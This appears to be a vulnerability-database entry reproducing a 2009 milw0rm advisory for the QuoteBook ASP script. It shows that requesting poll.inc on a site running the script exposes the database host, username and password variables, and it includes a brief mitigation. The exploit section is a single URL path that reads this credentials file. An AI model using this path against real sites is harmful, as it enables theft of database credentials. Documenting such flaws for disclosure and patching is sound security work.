QuoteBook Remote Config File Disclosure Vulnerability

vendor:

QuoteBook

by:

Moudi

8.5

CVSS

HIGH

Remote Config File Disclosure

200

CWE

Product Name: QuoteBook

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

QuoteBook Remote Config File Disclosure Vulnerability

The QuoteBook script is vulnerable to a remote config file disclosure vulnerability. An attacker can exploit this vulnerability by accessing the poll.inc file which contains the database credentials.

Mitigation:

The poll.inc file should be removed from the web server or access to it should be restricted.

Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================

==============================================================================
    QuoteBook Remote Config File Disclosure Vulnerability
==============================================================================

	[Â»] Script:             [ QuoteBook ]
	[Â»] Language:           [ ASP ]
	[Â»] Website:            [ http://www.freedville.com/oss/download.php?package=QuoteBook ]
	[Â»] Founder:            [ Moudi <m0udi@9.cn> ]
        [Â»] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]

###########################################################################

===[ Exploit ]===	
	
	[Â»] http://localhost/[path]/poll.inc

              $dbhost = "";
              $dbusername = "";
              $dbuserpass = "";
              $default_dbname = ";


Author: Moudi

###########################################################################

# milw0rm.com [2009-01-07]